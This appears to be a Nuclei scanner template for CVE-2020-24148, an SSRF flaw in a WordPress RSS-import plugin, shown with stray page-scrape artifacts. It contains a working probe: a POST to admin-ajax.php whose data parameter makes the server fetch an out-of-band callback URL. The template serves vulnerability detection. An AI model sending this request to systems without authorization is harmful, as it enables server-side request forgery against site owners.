23 lines
748 B
YAML
23 lines
748 B
YAML
|
id: CVE-2020-24148
|
||
|
|
||
|
info:
|
||
|
name: Import XML & RSS Feeds Wordpress Plugin <= 2.0.1 SSRF
|
||
|
tags: cve,cve2020,wordpress,wp-plugin,ssrf
|
||
|
author: dwisiswant0
|
||
|
severity: critical
|
||
|
reference: https://github.com/dwisiswant0/CVE-2020-24148
|
||
|
description: |
|
||
|
Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed)
|
||
|
plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.
|
||
|
|
||
|
requests:
|
||
|
- method: POST
|
||
|
path:
|
||
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"
|
||
|
body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0"
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||
|
words:
|
||
|
- "http"
|